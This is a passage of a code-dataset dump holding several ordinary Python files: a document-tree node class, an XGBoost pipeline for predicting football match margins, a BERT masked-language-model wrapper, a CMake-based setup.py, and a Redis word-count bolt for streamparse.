to_dict(self, old_version: bool) -> dict:\n res = OrderedDict()\n res[\"node_id\"] = self.node_id\n res[\"text\"] = self.text\n res[\"annotations\"] = [annotation.to_dict(old_version) for annotation in self.annotations]\n res[\"metadata\"] = self.metadata.to_dict(old_version)\n res[\"subparagraphs\"] = [node.to_dict(old_version) for node in self.subparagraphs]\n return res\n\n @staticmethod\n def get_api_dict(api: Api, depth: int = 0, name: str = 'TreeNode') -> Model:\n return api.model(name, {\n 'node_id': fields.String(description=\"Document element identifier. It is unique within one tree (i.e. \"\n \"there will be no other such node_id in this tree, but in attachment \"\n \"it may occur) The identifier has the form 0.2.1 where each number \"\n \"means a serial number at the corresponding level of the hierarchy.\",\n required=True,\n example=\"0.2.1\"\n ),\n 'text': fields.String(description=\"text of node\", required=True, example=\"Закон\"),\n 'annotations': fields.List(fields.Nested(Annotation.get_api_dict(api),\n description=\"Text annotations \"\n \"(font, size, bold, italic and etc)\")),\n 'metadata': fields.Nested(ParagraphMetadata.get_api_dict(api),\n skip_none=True,\n allow_null=False,\n description=\"Paragraph meta information\"),\n 'subparagraphs': fields.List(fields.Nested(api.model('others_TreeNode', {})),\n description=\"Node childes (with type 'TreeNode') of structure tree\")\n if depth == get_config()['recursion_deep_subparagraphs']\n else fields.List(fields.Nested(TreeNode.get_api_dict(api,\n depth=depth + 1,\n name='refTreeNode' + str(depth))),\n description=\"Node childes (with type 'TreeNode') of structure tree\")\n })\n\n @staticmethod\n def create(lines: List[LineWithMeta] = None) -> \"TreeNode\":\n \"\"\"\n Creates a root node with given text\n :param lines: this lines should be the title of the document (or should be empty for documents without title)\n :return: root of the document tree\n \"\"\"\n page_id = 0 if len(lines) == 0 else min((line.metadata.page_id for line in lines))\n line_id = 0 if len(lines) == 0 else min((line.metadata.line_id for line in lines))\n\n texts = (line.line for line in lines)\n annotations = []\n text_length = 0\n for line in lines:\n annotations.extend(TreeNode.__shift_annotations(line=line, text_length=text_length))\n text_length += len(line.line)\n text = \"\".join(texts)\n metadata = ParagraphMetadata(\n paragraph_type=\"root\",\n page_id=page_id,\n line_id=line_id,\n predicted_classes=None)\n return TreeNode(\"0\",\n text,\n annotations=annotations,\n metadata=metadata,\n subparagraphs=[],\n hierarchy_level=HierarchyLevel.create_root(),\n parent=None)\n\n def add_child(self, line: LineWithMeta) -> \"TreeNode\":\n \"\"\"\n Create a new tree node - children of the given node from given line. Return newly created node\n :param line: Line with meta, new node will be built from this line\n :return: return created node (child of the self)\n \"\"\"\n new_node = TreeNode(\n node_id=self.node_id + \".{}\".format(len(self.subparagraphs)),\n text=line.line,\n annotations=line.annotations,\n metadata=line.metadata,\n subparagraphs=[],\n hierarchy_level=line.hierarchy_level,\n parent=self\n )\n self.subparagraphs.append(new_node)\n return new_node\n\n def add_text(self, line: LineWithMeta):\n \"\"\"\n add the text and annotations from given line, text is separated with \\n\n :param line: line with text to add\n :return:\n \"\"\"\n text_length = len(self.text)\n new_annotations = self.__shift_annotations(line, text_length)\n\n self.text += line.line\n self.annotations.extend(new_annotations)\n\n @staticmethod\n def __shift_annotations(line: LineWithMeta, text_length: int) -> List[Annotation]:\n new_annotations = []\n for annotation in line.annotations:\n new_annotation = Annotation(start=annotation.start + text_length,\n end=annotation.end + text_length,\n name=annotation.name,\n value=annotation.value)\n new_annotations.append(new_annotation)\n return new_annotations\n\n def get_root(self):\n \"\"\"\n :return: return root of the tree\n \"\"\"\n node = self\n while node.parent is not None:\n node = node.parent\n return node\n\n def merge_annotations(self):\n root = self.get_root()\n stack = [root]\n merger = AnnotationMerger()\n while len(stack) > 0:\n node = stack.pop()\n node.annotations = merger.merge_annotations(node.annotations, node.text)\n for sub_node in node.subparagraphs:\n stack.append(sub_node)\n", "sub_path": "dedoc/data_structures/tree_node.py", "file_name": "tree_node.py", "file_ext": "py", "file_size_in_byte": 7770, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "dedoc.data_structures.serializable.Serializable", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "dedoc.data_structures.annotation.Annotation", "line_number": 20, "usage_type": "name"}, {"api_name": "dedoc.data_structures.paragraph_metadata.ParagraphMetadata", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "dedoc.structure_parser.heirarchy_level.HierarchyLevel", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 24, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 45, "usage_type": "call"}, {"api_name": "flask_restx.Api", "line_number": 54, "usage_type": "name"}, {"api_name": "flask_restx.fields.String", "line_number": 56, "usage_type": "call"}, {"api_name": "flask_restx.fields", "line_number": 56, "usage_type": "name"}, {"api_name": "flask_restx.fields.String", "line_number": 63, "usage_type": "call"}, {"api_name": "flask_restx.fields", "line_number": 63, "usage_type": "name"}, {"api_name": "flask_restx.fields.List", "line_number": 64, "usage_type": "call"}, {"api_name": "flask_restx.fields", "line_number": 64, "usage_type": "name"}, {"api_name": "flask_restx.fields.Nested", "line_number": 64, "usage_type": "call"}, {"api_name": "dedoc.data_structures.annotation.Annotation.get_api_dict", "line_number": 64, "usage_type": "call"}, {"api_name": "dedoc.data_structures.annotation.Annotation", "line_number": 64, "usage_type": "name"}, {"api_name": "flask_restx.fields.Nested", "line_number": 67, "usage_type": "call"}, {"api_name": "flask_restx.fields", "line_number": 67, "usage_type": "name"}, {"api_name": "dedoc.data_structures.paragraph_metadata.ParagraphMetadata.get_api_dict", "line_number": 67, "usage_type": "call"}, {"api_name": "dedoc.data_structures.paragraph_metadata.ParagraphMetadata", "line_number": 67, "usage_type": "name"}, {"api_name": "dedoc.config.get_config", "line_number": 73, "usage_type": "call"}, {"api_name": "flask_restx.fields.List", "line_number": 71, "usage_type": "call"}, {"api_name": "flask_restx.fields", "line_number": 71, "usage_type": "name"}, {"api_name": "flask_restx.fields.Nested", "line_number": 71, "usage_type": "call"}, {"api_name": "flask_restx.fields.List", "line_number": 74, "usage_type": "call"}, {"api_name": "flask_restx.fields", "line_number": 74, "usage_type": "name"}, {"api_name": "flask_restx.fields.Nested", "line_number": 74, "usage_type": "call"}, {"api_name": "flask_restx.Model", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 81, "usage_type": "name"}, {"api_name": "dedoc.data_structures.line_with_meta.LineWithMeta", "line_number": 81, "usage_type": "name"}, {"api_name": "dedoc.data_structures.paragraph_metadata.ParagraphMetadata", "line_number": 97, "usage_type": "call"}, {"api_name": "dedoc.structure_parser.heirarchy_level.HierarchyLevel.create_root", "line_number": 107, "usage_type": "call"}, {"api_name": "dedoc.structure_parser.heirarchy_level.HierarchyLevel", "line_number": 107, "usage_type": "name"}, {"api_name": "dedoc.data_structures.line_with_meta.LineWithMeta", "line_number": 110, "usage_type": "name"}, {"api_name": "dedoc.data_structures.line_with_meta.LineWithMeta", "line_number": 128, "usage_type": "name"}, {"api_name": "dedoc.data_structures.line_with_meta.LineWithMeta", "line_number": 141, "usage_type": "name"}, {"api_name": "dedoc.data_structures.annotation.Annotation", "line_number": 144, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 141, "usage_type": "name"}, {"api_name": "dedoc.data_structures.annotation.Annotation", "line_number": 141, "usage_type": "name"}, {"api_name": "dedoc.structure_constructor.annotation_merger.AnnotationMerger", "line_number": 163, "usage_type": "call"}]}
+{"seq_id": "289271553", "text": "\"\"\"Module with wrapper class for XGBoost model and its associated data class\"\"\"\n\nfrom typing import List, Tuple, Optional, Union, Sequence, Callable\nimport os\nfrom functools import reduce\nimport pandas as pd\nimport numpy as np\nfrom sklearn.pipeline import make_pipeline, Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.externals import joblib\nfrom sklearn.base import BaseEstimator\nfrom xgboost import XGBRegressor\n\nfrom server.types import FeatureFunctionType\nfrom server.data_processors import (\n TeamDataStacker,\n FeatureBuilder,\n OppoFeatureBuilder\n)\nfrom server.data_processors.feature_functions import (\n add_last_week_result,\n add_last_week_score,\n add_cum_percent,\n add_cum_win_points,\n add_rolling_last_week_win_rate,\n add_ladder_position,\n add_win_streak,\n add_out_of_state,\n add_travel_distance,\n add_last_week_goals,\n add_last_week_behinds,\n)\nfrom server.data_processors import FitzroyDataReader\n\nYearsType = Tuple[Optional[int], Optional[int]]\n\nPROJECT_PATH: str = os.path.abspath(\n os.path.join(os.path.dirname(__file__), '../../../')\n)\n\n\nCOL_TRANSLATIONS = {\n 'home_points': 'home_score',\n 'away_points': 'away_score',\n 'margin': 'home_margin',\n 'season': 'year'\n}\nINDEX_COLS = ['team', 'year', 'round_number']\nREQUIRED_COLS: List[str] = ['year', 'score', 'oppo_score']\nFEATURE_FUNCS: Sequence[FeatureFunctionType] = [\n add_out_of_state,\n add_travel_distance,\n add_last_week_goals,\n add_last_week_behinds,\n add_last_week_result,\n add_last_week_score,\n add_cum_win_points,\n add_rolling_last_week_win_rate,\n add_win_streak\n]\nDATA_TRANSFORMERS: List[FeatureFunctionType] = [\n TeamDataStacker(index_cols=INDEX_COLS).transform,\n FeatureBuilder(feature_funcs=FEATURE_FUNCS).transform,\n OppoFeatureBuilder(\n match_cols=['team', 'year', 'round_number', 'score', 'oppo_score',\n 'out_of_state', 'at_home', 'oppo_team', 'venue', 'round_type']\n ).transform,\n # Features dependent on oppo columns\n FeatureBuilder(\n feature_funcs=[add_cum_percent, add_ladder_position]\n ).transform\n]\nDATA_READERS: List[Callable] = [FitzroyDataReader().match_results]\n\nnp.random.seed(42)\n\n\nclass MatchXGB():\n \"\"\"Create pipeline for for fitting/predicting with lasso model.\n\n Attributes:\n _pipeline (sklearn.pipeline.Pipeline): Scikit Learn pipeline\n with transformers & Lasso estimator.\n name (string): Name of final estimator in the pipeline ('XGBoost').\n \"\"\"\n\n def __init__(self) -> None:\n self._pipeline: Pipeline = make_pipeline(\n StandardScaler(), XGBRegressor()\n )\n\n @property\n def name(self) -> str:\n return self.__last_estimator()[0]\n\n def fit(self, X: pd.DataFrame, y: pd.Series) -> None:\n \"\"\"Fit estimator to the data.\n\n Args:\n X (pandas.DataFrame): Data features.\n y (pandas.Series): Data labels.\n\n Returns:\n None.\n \"\"\"\n\n self._pipeline.fit(X, y)\n\n def predict(self, X: pd.DataFrame) -> pd.Series:\n \"\"\"Make predictions base on the data input.\n\n Args:\n X (pandas.DataFrame): Data features.\n\n Returns:\n pandas.Series: Estimator predictions.\n \"\"\"\n\n y_pred = self._pipeline.predict(X)\n\n return pd.Series(y_pred, name='predicted_margin', index=X.index)\n\n def save(self,\n filepath: str = (f'{PROJECT_PATH}/server/ml_models/match_xgb/'\n 'match_xgb_model.pkl')) -> None:\n \"\"\"Save the pipeline as a pickle file.\n\n Args:\n filepath (string): The path where the pickle file is saved.\n\n Returns:\n None.\n \"\"\"\n\n joblib.dump(self._pipeline, filepath)\n\n def load(self,\n filepath: str = (f'{PROJECT_PATH}/server/ml_models/match_xgb/'\n 'match_xgb_model.pkl')) -> None:\n \"\"\"Load the pipeline from a pickle file.\n\n Args:\n filepath (string): The path to the file to laod.\n\n Returns:\n None.\n \"\"\"\n\n self._pipeline = joblib.load(filepath)\n\n def __last_estimator(self) -> Tuple[str, BaseEstimator]:\n return self._pipeline.steps[-1]\n\n\nclass MatchXGBData():\n \"\"\"Load and clean data for the XGB pipeline.\n\n Args:\n data_transformers (list[callable]): Functions that receive, transform,\n and return data frames.\n train_years (tuple[integer or None]): Minimum and maximum (inclusive) years\n for the training data.\n test_years (tuple[ingeter or None]): Minimum and maximum (inclusive) years\n for the test data.\n\n Attributes:\n data (pandas.DataFrame): Cleaned, unfiltered data frame.\n train_years (tuple[integer or None]): Minimum and maximum (inclusive) years\n for the training data.\n test_years (tuple[ingeter or None]): Minimum and maximum (inclusive) years\n for the test data.\n \"\"\"\n\n def __init__(self,\n data_readers: List[Callable] = DATA_READERS,\n data_transformers: List[FeatureFunctionType] = DATA_TRANSFORMERS,\n train_years: YearsType = (None, 2015),\n test_years: YearsType = (2016, 2016)) -> None:\n self._train_years = train_years\n self._test_years = test_years\n\n # Need to reverse the transformation steps, because composition makes the output\n # of each new function the argument for the previous\n compose_all = reduce(\n self.__compose_two, reversed(data_transformers), lambda x: x\n )\n\n data_frame = (data_readers[0]()\n .rename(columns=COL_TRANSLATIONS)\n .drop(['round', 'game', 'date'], axis=1))\n\n # There was some sort of round-robin finals round in 1897 and figuring out\n # a way to clean it up that makes sense is more trouble than just dropping a few rows\n data_frame = data_frame[(data_frame['year'] != 1897) &\n (data_frame['round_number'] != 15)]\n\n self.data = compose_all(data_frame).drop('venue', axis=1).dropna()\n\n def train_data(self) -> Tuple[pd.DataFrame, pd.DataFrame]:\n \"\"\"Filter data by year to produce training data.\n\n Returns:\n Tuple[pandas.DataFrame]: Training features and labels.\n \"\"\"\n\n data_train = self.data[\n (self.data['year'] >= self.__train_min()) &\n (self.data['year'] <= self.__train_max())\n ]\n\n X_train = self.__X(data_train)\n y_train = self.__y(data_train)\n\n return X_train, y_train\n\n def test_data(self) -> Tuple[pd.DataFrame, pd.DataFrame]:\n \"\"\"Filter data by year to produce test data.\n\n Returns:\n Tuple[pandas.DataFrame]: Test features and labels.\n \"\"\"\n\n data_test = self.data[\n (self.data['year'] >= self.__test_min()) &\n (self.data['year'] <= self.__test_max())\n ]\n X_test = self.__X(data_test)\n y_test = self.__y(data_test)\n\n return X_test, y_test\n\n @property\n def train_years(self) -> YearsType:\n return self._train_years\n\n @train_years.setter\n def train_years(self, years: YearsType) -> None:\n self._train_years = years\n\n @property\n def test_years(self) -> YearsType:\n return self._test_years\n\n @test_years.setter\n def test_years(self, years: YearsType) -> None:\n self._test_years = years\n\n def __train_min(self) -> Union[int, float]:\n return self._train_years[0] or np.NINF\n\n def __train_max(self) -> Union[int, float]:\n return self._train_years[1] or np.Inf\n\n def __test_min(self) -> Union[int, float]:\n return self._test_years[0] or np.NINF\n\n def __test_max(self) -> Union[int, float]:\n return self._test_years[1] or np.Inf\n\n def __X(self, data_frame: pd.DataFrame) -> pd.DataFrame:\n data_dummies = pd.get_dummies(self.data.select_dtypes('O'))\n X_data = pd.get_dummies(\n data_frame.drop(['score', 'oppo_score'], axis=1)\n )\n\n # Have to get missing dummy columns, because train & test years can have different\n # teams/venues, resulting in data mismatch when trying to predict with a model\n missing_cols = np.setdiff1d(data_dummies.columns, X_data.columns)\n missing_df = pd.DataFrame(\n {missing_col: 0 for missing_col in missing_cols}, index=X_data.index\n )\n\n return pd.concat([X_data, missing_df], axis=1).astype(float)\n\n @staticmethod\n def __compose_two(composed_func: FeatureFunctionType,\n func_element: FeatureFunctionType) -> FeatureFunctionType:\n return lambda x: composed_func(func_element(x))\n\n @staticmethod\n def __y(data_frame: pd.DataFrame) -> pd.Series:\n return data_frame['score'] - data_frame['oppo_score']\n", "sub_path": "server/ml_models/match_xgb/match_xgb.py", "file_name": "match_xgb.py", "file_ext": "py", "file_size_in_byte": 8969, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "typing.Tuple", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 35, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 38, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Sequence", "line_number": 50, "usage_type": "name"}, {"api_name": "server.types.FeatureFunctionType", "line_number": 50, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_out_of_state", "line_number": 51, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_travel_distance", "line_number": 52, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_last_week_goals", "line_number": 53, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_last_week_behinds", "line_number": 54, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_last_week_result", "line_number": 55, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_last_week_score", "line_number": 56, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_cum_win_points", "line_number": 57, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_rolling_last_week_win_rate", "line_number": 58, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_win_streak", "line_number": 59, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 61, "usage_type": "name"}, {"api_name": "server.types.FeatureFunctionType", "line_number": 61, "usage_type": "name"}, {"api_name": "server.data_processors.TeamDataStacker", "line_number": 62, "usage_type": "call"}, {"api_name": "server.data_processors.FeatureBuilder", "line_number": 63, "usage_type": "call"}, {"api_name": "server.data_processors.OppoFeatureBuilder", "line_number": 64, "usage_type": "call"}, {"api_name": "server.data_processors.FeatureBuilder", "line_number": 69, "usage_type": "call"}, {"api_name": "server.data_processors.feature_functions.add_cum_percent", "line_number": 70, "usage_type": "name"}, {"api_name": "server.data_processors.feature_functions.add_ladder_position", "line_number": 70, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 73, "usage_type": "name"}, {"api_name": "server.data_processors.FitzroyDataReader", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 75, "usage_type": "attribute"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 88, "usage_type": "name"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 89, "usage_type": "call"}, {"api_name": "xgboost.XGBRegressor", "line_number": 89, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 109, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 121, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 109, "usage_type": "attribute"}, {"api_name": "sklearn.externals.joblib.dump", "line_number": 135, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 135, "usage_type": "name"}, {"api_name": "sklearn.externals.joblib.load", "line_number": 149, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib", "line_number": 149, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 151, "usage_type": "name"}, {"api_name": "sklearn.base.BaseEstimator", "line_number": 151, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 175, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 175, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 176, "usage_type": "name"}, {"api_name": "server.types.FeatureFunctionType", "line_number": 176, "usage_type": "name"}, {"api_name": "functools.reduce", "line_number": 184, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 199, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 199, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 216, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 216, "usage_type": "attribute"}, {"api_name": "numpy.NINF", "line_number": 249, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 248, "usage_type": "name"}, {"api_name": "numpy.Inf", "line_number": 252, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 251, "usage_type": "name"}, {"api_name": "numpy.NINF", "line_number": 255, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 254, "usage_type": "name"}, {"api_name": "numpy.Inf", "line_number": 258, "usage_type": "attribute"}, {"api_name": "typing.Union", "line_number": 257, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 260, "usage_type": "attribute"}, {"api_name": "pandas.get_dummies", "line_number": 261, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.setdiff1d", "line_number": 268, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 269, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 273, "usage_type": "call"}, {"api_name": "server.types.FeatureFunctionType", "line_number": 276, "usage_type": "name"}, {"api_name": "server.types.FeatureFunctionType", "line_number": 277, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 281, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 281, "usage_type": "attribute"}]}
+{"seq_id": "196521341", "text": "from ml_gym.models.nn.net import NNModel\nfrom typing import Dict\nimport torch\nfrom transformers import AutoConfig, AutoModelForMaskedLM\n\n\nclass BERTLM(NNModel):\n\n def __init__(self, prediction_publication_key: str, bert_version: str = \"bert-base-uncased\"):\n super().__init__()\n self.prediction_publication_key = prediction_publication_key\n config = AutoConfig.from_pretrained(bert_version)\n self.model = AutoModelForMaskedLM.from_config(config)\n\n def forward_impl(self, inputs: torch.Tensor) -> Dict[str, torch.Tensor]:\n outputs = self.model(inputs)\n output_dict = {self.prediction_publication_key: outputs.logits}\n return output_dict\n\n def forward(self, inputs: torch.Tensor) -> Dict[str, torch.Tensor]:\n return self.forward_impl(inputs)\n\n\nif __name__ == '__main__':\n from datasets import load_from_disk\n from transformers import DataCollatorForLanguageModeling, BertTokenizerFast\n from torch.utils.data import DataLoader\n\n tokenizer = BertTokenizerFast(tokenizer_file=\"/scratch/max/mlgym/example/transformer/tokenizers/trained_wiki_tokenizer/tokenizer.json\")\n chunked_tokenized_dataset = load_from_disk(\"example/transformer/preprocessed_datasets/chunked_tokenized_dataset_train\")\n mlm_probability = 0.15\n batch_size = 30\n\n data_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm_probability=mlm_probability, pad_to_multiple_of=8)\n\n train_dataloader = DataLoader(chunked_tokenized_dataset, shuffle=True, batch_size=batch_size, collate_fn=data_collator)\n\n sample = next(iter(train_dataloader))\n model = BERTLM(\"\")\n prediction = model(sample[\"input_ids\"])\n print(\"\")\n", "sub_path": "example/bert/bert_model.py", "file_name": "bert_model.py", "file_ext": "py", "file_size_in_byte": 1687, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "ml_gym.models.nn.net.NNModel", "line_number": 7, "usage_type": "name"}, {"api_name": "transformers.AutoConfig.from_pretrained", "line_number": 12, "usage_type": "call"}, {"api_name": "transformers.AutoConfig", "line_number": 12, "usage_type": "name"}, {"api_name": "transformers.AutoModelForMaskedLM.from_config", "line_number": 13, "usage_type": "call"}, {"api_name": "transformers.AutoModelForMaskedLM", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 15, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 20, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 20, "usage_type": "name"}, {"api_name": "transformers.BertTokenizerFast", "line_number": 29, "usage_type": "call"}, {"api_name": "datasets.load_from_disk", "line_number": 30, "usage_type": "call"}, {"api_name": "transformers.DataCollatorForLanguageModeling", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "38966670", "text": "import os\nimport re\nimport sys\nimport platform\nimport subprocess\nfrom distutils.version import LooseVersion\nfrom setuptools import setup, Extension\nfrom setuptools.command.build_ext import build_ext\n\n\nclass CMakeExtension(Extension):\n def __init__(self, name, sourcedir=''):\n Extension.__init__(self, name, sources=[])\n self.sourcedir = os.path.abspath(sourcedir)\n\n\nclass CMakeBuild(build_ext):\n def run(self):\n try:\n out = subprocess.check_output(['cmake', '--version'])\n except OSError:\n raise RuntimeError(\n \"CMake must be installed to build the following extensions: \" +\n \", \".join(e.name for e in self.extensions))\n\n if platform.system() == \"Windows\":\n cmake_version = LooseVersion(re.search(r'version\\s*([\\d.]+)',\n out.decode()).group(1))\n if cmake_version < '3.1.0':\n raise RuntimeError(\"CMake >= 3.1.0 is required on Windows\")\n\n for ext in self.extensions:\n self.build_extension(ext)\n\n def build_extension(self, ext):\n extdir = os.path.abspath(\n os.path.dirname(self.get_ext_fullpath(ext.name)))\n cmake_args = ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir,\n '-DPYTHON_EXECUTABLE=' + sys.executable]\n\n cfg = 'Debug' if self.debug else 'Release'\n build_args = ['--config', cfg]\n\n if platform.system() == \"Windows\":\n cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(\n cfg.upper(),\n extdir)]\n if sys.maxsize > 2**32:\n cmake_args += ['-A', 'x64']\n build_args += ['--', '/m']\n else:\n cmake_args += ['-DCMAKE_BUILD_TYPE=' + cfg]\n build_args += ['--', '-j2']\n\n env = os.environ.copy()\n env['CXXFLAGS'] = '{} -DVERSION_INFO=\\\\\"{}\\\\\"'.format(\n env.get('CXXFLAGS', ''),\n self.distribution.get_version())\n if not os.path.exists(self.build_temp):\n os.makedirs(self.build_temp)\n subprocess.check_call(['cmake', ext.sourcedir] + cmake_args,\n cwd=self.build_temp, env=env)\n subprocess.check_call(['cmake', '--build', '.'] + build_args,\n cwd=self.build_temp)\n print() # Add an empty line for cleaner output\n\nrequirements = [\n 'numpy>=1.16.5',\n ]\n\ntest_requirements = [\n 'numpy>=1.16.5',\n ]\n\nlong_description = \"Python library for sGMRFmix model for anomaly detection in time-series data. sGMRFmix is short for sparse mixture of Gaussian Markov Random Fields. This is essentially a C++ (and python) port of the R package `sGMRFmix` to make it run faster for larger datasets.\"\n\nsetup(\n name='sgmrfmix',\n version='0.1',\n author='Anand K Subramanian',\n author_email='anandkrish894@gmail.com',\n url='https://github.com/AntixK/sGMRFmix',\n description='Python library for sparse Gaussian Markov Random Field mixtures for anomaly detection',\n long_description=long_description,\n packages=['sgmrfmix'],\n ext_modules=[CMakeExtension('_sgmrfmix')],\n cmdclass=dict(build_ext=CMakeBuild),\n install_requires=requirements,\n tests_require=test_requirements,\n zip_safe=False,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Topic :: Scientific/Engineering\",\n ],\n python_requires='>=3.6', # For Python thread specific storage API\n)", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 3668, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "setuptools.Extension", "line_number": 11, "usage_type": "name"}, {"api_name": "setuptools.Extension.__init__", "line_number": 13, "usage_type": "call"}, {"api_name": "setuptools.Extension", "line_number": 13, "usage_type": "name"}, {"api_name": "os.path.abspath", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "setuptools.command.build_ext.build_ext", "line_number": 17, "usage_type": "name"}, {"api_name": "subprocess.check_output", "line_number": 20, "usage_type": "call"}, {"api_name": "platform.system", "line_number": 26, "usage_type": "call"}, {"api_name": "distutils.version.LooseVersion", "line_number": 27, "usage_type": "call"}, {"api_name": "re.search", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 39, "usage_type": "attribute"}, {"api_name": "platform.system", "line_number": 44, "usage_type": "call"}, {"api_name": "sys.maxsize", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.environ.copy", "line_number": 55, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 60, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 61, "usage_type": "call"}, {"api_name": "subprocess.check_call", "line_number": 63, "usage_type": "call"}, {"api_name": "setuptools.setup", "line_number": 77, "usage_type": "call"}]}
+{"seq_id": "541345508", "text": "import os\nfrom collections import Counter\n\nfrom redis import StrictRedis\n\nfrom streamparse import Bolt\n\n\nclass WordCountBolt(Bolt):\n outputs = ['word', 'count']\n\n def initialize(self, conf, ctx):\n self.counter = Counter()\n self.pid = os.getpid()\n self.total = 0\n\n def _increment(self, word, inc_by):\n self.counter[word] += inc_by\n self.total += inc_by\n\n def process(self, tup):\n word = tup.values[0]\n self._increment(word, 10 if word == \"dog\" else 1)\n if self.total % 1000 == 0:\n self.logger.info(\"counted [{:,}] words [pid={}]\".format(self.total,\n self.pid))\n self.emit([word, self.counter[word]])\n\n\nclass RedisWordCountBolt(WordCountBolt):\n def initialize(self, conf, ctx):\n self.pid = os.getpid()\n self.redis = StrictRedis()\n self.total = 0\n\n def _increment(self, word, inc_by):\n self.total += inc_by\n self.redis.zincrby(\"words\", word, inc_by)\n", "sub_path": "examples/redis/src/bolts.py", "file_name": "bolts.py", "file_ext": "py", "file_size_in_byte": 1041, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "streamparse.Bolt", "line_number": 9, "usage_type": "name"}, {"api_name": "collections.Counter", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 14, "usage_type": 